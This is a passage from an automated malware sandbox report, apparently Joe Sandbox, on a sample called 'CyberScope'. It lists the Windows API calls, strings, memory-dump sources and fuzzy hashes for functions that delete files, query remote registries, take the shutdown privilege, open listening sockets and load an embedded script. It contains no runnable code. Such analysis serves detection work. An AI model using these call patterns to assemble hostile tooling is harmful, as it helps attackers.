                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0020A13F
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0020A18F
                                                                                    • SetCurrentDirectoryW.KERNEL32(00257B94), ref: 0020A1AD
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0020A1B7
                                                                                    • FindClose.KERNEL32(00000000), ref: 0020A1C4
                                                                                    • FindClose.KERNEL32(00000000), ref: 0020A1D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1409584000-438819550
                                                                                    • Opcode ID: 8e5911d397bb4e6375b0396d63be6d068df2995814f36187d96633bc24c4e428
                                                                                    • Instruction ID: 202bb90069611a4debe36edcad56703b4b08eec4f3613bc4d84baef93fd52279
                                                                                    • Opcode Fuzzy Hash: 8e5911d397bb4e6375b0396d63be6d068df2995814f36187d96633bc24c4e428
                                                                                    • Instruction Fuzzy Hash: CA31D33161031EBBDB20AFB4EC4DADEB3AD9F15321F5001A5E819E20D1EB70DA558A65
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00204785
                                                                                    • _wcslen.LIBCMT ref: 002047B2
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002047E2
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00204803
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00204813
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0020489A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002048A5
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002048B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 1149970189-3457252023
                                                                                    • Opcode ID: 50b3b2fe003a0489dcc81408ddc1639f87f7c7ad7ed29c4daecf3152a7b167cd
                                                                                    • Instruction ID: 51c5905e5aace68d37815a9339e6ed1393fb3f4c772cfd50ee1f947c3c11d809
                                                                                    • Opcode Fuzzy Hash: 50b3b2fe003a0489dcc81408ddc1639f87f7c7ad7ed29c4daecf3152a7b167cd
                                                                                    • Instruction Fuzzy Hash: 0D31B4B551024AABDB219FA0DC49FEB37BCEF89700F1081B6FA09D20A1E77096558B64
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0020A203
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0020A25E
                                                                                    • FindClose.KERNEL32(00000000), ref: 0020A269
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0020A285
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0020A2D5
                                                                                    • SetCurrentDirectoryW.KERNEL32(00257B94), ref: 0020A2F3
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0020A2FD
                                                                                    • FindClose.KERNEL32(00000000), ref: 0020A30A
                                                                                    • FindClose.KERNEL32(00000000), ref: 0020A31A
                                                                                      • Part of subcall function 001FE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001FE3B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 2640511053-438819550
                                                                                    • Opcode ID: a6f47e000c8bda47f26b0b032e856afc8e8612cb07cb74dc9e09bf710e43112d
                                                                                    • Instruction ID: 7864f0295cd95690bd14ed326379f4238c327844633ef6d02ad45e3c3336607d
                                                                                    • Opcode Fuzzy Hash: a6f47e000c8bda47f26b0b032e856afc8e8612cb07cb74dc9e09bf710e43112d
                                                                                    • Instruction Fuzzy Hash: 9331F23151031EBECB20AFB4EC09EDE77ADAF45325F5041A1EC10A30E2DB71DEA58A55
                                                                                    APIs
                                                                                      • Part of subcall function 0021D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0021C10E,?,?), ref: 0021D415
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D451
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4C8
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4FE
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0021C99E
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0021CA09
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0021CA2D
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0021CA8C
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0021CB47
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0021CBB4
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0021CC49
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0021CC9A
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0021CD43
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0021CDE2
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0021CDEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3102970594-0
                                                                                    • Opcode ID: 7808fead354e0c854d839bdbae38adf250df622c33c90212cc266fb94648b8cc
                                                                                    • Instruction ID: 658d0292fe28173c990c8a9fc81046319547c7e09df01576d3e1a0dbece53321
                                                                                    • Opcode Fuzzy Hash: 7808fead354e0c854d839bdbae38adf250df622c33c90212cc266fb94648b8cc
                                                                                    • Instruction Fuzzy Hash: 9D029274614201AFC714DF28C895E6ABBE5FF59304F18849DF84ACB2A2CB31ED52CB91
                                                                                    APIs
                                                                                      • Part of subcall function 00195851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001955D1,?,?,001D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00195871
                                                                                      • Part of subcall function 001FEAB0: GetFileAttributesW.KERNEL32(?,001FD840), ref: 001FEAB1
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001FD9CD
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001FDA88
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001FDA9B
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 001FDAB8
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001FDAE2
                                                                                      • Part of subcall function 001FDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001FDAC7,?,?), ref: 001FDB5D
                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 001FDAFE
                                                                                    • FindClose.KERNEL32(00000000), ref: 001FDB0F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1946585618-1173974218
                                                                                    • Opcode ID: 13346cc95499488d56241324c93e9592f0c5402e77cbcd7362663ef6c9861fdb
                                                                                    • Instruction ID: 6e0fe31be15d23ab7effffc0d458ae26b09ac2e323dfcecebb759d97bd3948b5
                                                                                    • Opcode Fuzzy Hash: 13346cc95499488d56241324c93e9592f0c5402e77cbcd7362663ef6c9861fdb
                                                                                    • Instruction Fuzzy Hash: 03616E3180510DAECF15EBE0EA929FDB7B6AF25304F2441A5E502B7192EB315F0ACB60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: ecc7cdedd14cc0de0c4e6f05f811e322ef9a724f6205e6a3cf641f850070973f
                                                                                    • Instruction ID: 5ec6ac052583c575ba23dd4b18aeca8950bab095c368915e4594009308878abc
                                                                                    • Opcode Fuzzy Hash: ecc7cdedd14cc0de0c4e6f05f811e322ef9a724f6205e6a3cf641f850070973f
                                                                                    • Instruction Fuzzy Hash: 63418B30614602EFD720CF15E98CB65BBE4EF44318F14C4A9E8198BAA3CB75EC42CB90
                                                                                    APIs
                                                                                      • Part of subcall function 001F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F205A
                                                                                      • Part of subcall function 001F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F2087
                                                                                      • Part of subcall function 001F2010: GetLastError.KERNEL32 ref: 001F2097
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 001FF249
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-3163812486
                                                                                    • Opcode ID: 882f4f208087cf133ada4c6f0dcea3390e404cdb57272ae1c641cb2eee3a50cb
                                                                                    • Instruction ID: dc2a5428d3bbd3195791ea084e3f4108013e1b0c2097b072ed583c7aa288f532
                                                                                    • Opcode Fuzzy Hash: 882f4f208087cf133ada4c6f0dcea3390e404cdb57272ae1c641cb2eee3a50cb
                                                                                    • Instruction Fuzzy Hash: 8F01D67A6102186BEB2862B8AC8AFBA726C9F08344F150535FF03E21D2D7E0CD0691A0
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00211CD3
                                                                                    • WSAGetLastError.WSOCK32 ref: 00211CE0
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00211D17
                                                                                    • WSAGetLastError.WSOCK32 ref: 00211D22
                                                                                    • closesocket.WSOCK32(00000000), ref: 00211D51
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00211D60
                                                                                    • WSAGetLastError.WSOCK32 ref: 00211D6A
                                                                                    • closesocket.WSOCK32(00000000), ref: 00211D99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 540024437-0
                                                                                    • Opcode ID: 980980eeaf7bec45d8f4cf927bbf1884cb2f44ff15086f484a0f42ea1a917cff
                                                                                    • Instruction ID: d6cabe77836c780bf868a1c12e634aa2585648e867d90a004dc78dd7e3487ec3
                                                                                    • Opcode Fuzzy Hash: 980980eeaf7bec45d8f4cf927bbf1884cb2f44ff15086f484a0f42ea1a917cff
                                                                                    • Instruction Fuzzy Hash: 8C419331600101AFD720DF68D488B66BBF5BF55318F188199D9568F2D2C771EC92CBE1
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 001CBD54
                                                                                    • _free.LIBCMT ref: 001CBD78
                                                                                    • _free.LIBCMT ref: 001CBEFF
                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,002346D0), ref: 001CBF11
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0026221C,000000FF,00000000,0000003F,00000000,?,?), ref: 001CBF89
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00262270,000000FF,?,0000003F,00000000,?), ref: 001CBFB6
                                                                                    • _free.LIBCMT ref: 001CC0CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                    • String ID:
                                                                                    • API String ID: 314583886-0
                                                                                    • Opcode ID: a5790db09ac323e18fcfb34bde0947af2d960d6c06a680b37e71dc90ffd3dec8
                                                                                    • Instruction ID: 19611e28f87e5a93004c6d308162d59d2e9f256ba257cbc73b8c1089a5db5d18
                                                                                    • Opcode Fuzzy Hash: a5790db09ac323e18fcfb34bde0947af2d960d6c06a680b37e71dc90ffd3dec8
                                                                                    • Instruction Fuzzy Hash: D3C12471908254ABDB249F78DC86FAA7BB8EF71710F14419EE985DB291E730CE418B90
                                                                                    APIs
                                                                                    • DefDlgProcW.USER32(?,?), ref: 0019233E
                                                                                    • GetSysColor.USER32(0000000F), ref: 00192421
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00192434
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Proc
                                                                                    • String ID: (&
                                                                                    • API String ID: 929743424-1801568203
                                                                                    • Opcode ID: b30a724132dae4264c1f0bd3d7c67638d5d40721e6f20c7d1495bdd08dd9615f
                                                                                    • Instruction ID: 1f4d619d3945f8d4942a19e6c18f55fb9d0c1813a11a5dbd0c64b0559c8461a2
                                                                                    • Opcode Fuzzy Hash: b30a724132dae4264c1f0bd3d7c67638d5d40721e6f20c7d1495bdd08dd9615f
                                                                                    • Instruction Fuzzy Hash: 1B8118F0114814BEEA3D663C5C98E7F255EFB4A700F16020AF102DA795CB799F529277
                                                                                    APIs
                                                                                      • Part of subcall function 00195851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001955D1,?,?,001D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00195871
                                                                                      • Part of subcall function 001FEAB0: GetFileAttributesW.KERNEL32(?,001FD840), ref: 001FEAB1
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001FDCCB
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 001FDD1B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001FDD2C
                                                                                    • FindClose.KERNEL32(00000000), ref: 001FDD43
                                                                                    • FindClose.KERNEL32(00000000), ref: 001FDD4C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2649000838-1173974218
                                                                                    • Opcode ID: 131313305fd4592bdae046f3b471c7e5daec918b227c0e53dec9ada8ebc01e0a
                                                                                    • Instruction ID: 1d549ee15a9155b4c07fd9a9473d8a98b53b81cae67829c2ef915e1b0564f7e2
                                                                                    • Opcode Fuzzy Hash: 131313305fd4592bdae046f3b471c7e5daec918b227c0e53dec9ada8ebc01e0a
                                                                                    • Instruction Fuzzy Hash: 9831A231009348AFC700EB60E9958FFB7E9BEA1304F400E5DF9D182191EB21DA09CB63
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001D56C2,?,?,00000000,00000000), ref: 00203A1E
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001D56C2,?,?,00000000,00000000), ref: 00203A35
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,001D56C2,?,?,00000000,00000000,?,?,?,?,?,?,001966CE), ref: 00203A45
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,001D56C2,?,?,00000000,00000000,?,?,?,?,?,?,001966CE), ref: 00203A56
                                                                                    • LockResource.KERNEL32(001D56C2,?,?,001D56C2,?,?,00000000,00000000,?,?,?,?,?,?,001966CE,?), ref: 00203A65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 483bfa4fb363267f1f0a6e848cc131dc1343e5ea4db62d2bd0bf4f347bd9fe21
                                                                                    • Instruction ID: e73968743dbf71e785b909593503b3b168f44cbea7bcfaa9236f4fb9943c17cb
                                                                                    • Opcode Fuzzy Hash: 483bfa4fb363267f1f0a6e848cc131dc1343e5ea4db62d2bd0bf4f347bd9fe21
                                                                                    • Instruction Fuzzy Hash: 81113971210702BFE7318F65EC48F277BBDEBC5B51F14426CB8429A6A1DB71E9118A60
                                                                                    APIs
                                                                                      • Part of subcall function 001F1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001F1916
                                                                                      • Part of subcall function 001F1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001F1922
                                                                                      • Part of subcall function 001F1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001F1931
                                                                                      • Part of subcall function 001F1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001F1938
                                                                                      • Part of subcall function 001F1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001F194E
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,001F1C81), ref: 001F20FB
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001F2107
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001F210E
                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 001F2127
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,001F1C81), ref: 001F213B
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F2142
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 3008561057-0
                                                                                    • Opcode ID: f48a4d97da12db9d5a2f27ecc1cd586ecb2576bfa9d0f169daf2e50482dd7fec
                                                                                    • Instruction ID: cd42847a8e89a589351dfab6275960425a5a030631c66dd59f83b55bac7f9841
                                                                                    • Opcode Fuzzy Hash: f48a4d97da12db9d5a2f27ecc1cd586ecb2576bfa9d0f169daf2e50482dd7fec
                                                                                    • Instruction Fuzzy Hash: D7118E72501209FFDB249FA4DC19FBE7BB9EF45355F144018EA4997120C735AE42CB64
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0020A5BD
                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0020A6D0
                                                                                      • Part of subcall function 002042B9: GetInputState.USER32 ref: 00204310
                                                                                      • Part of subcall function 002042B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002043AB
                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0020A5ED
                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0020A6BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
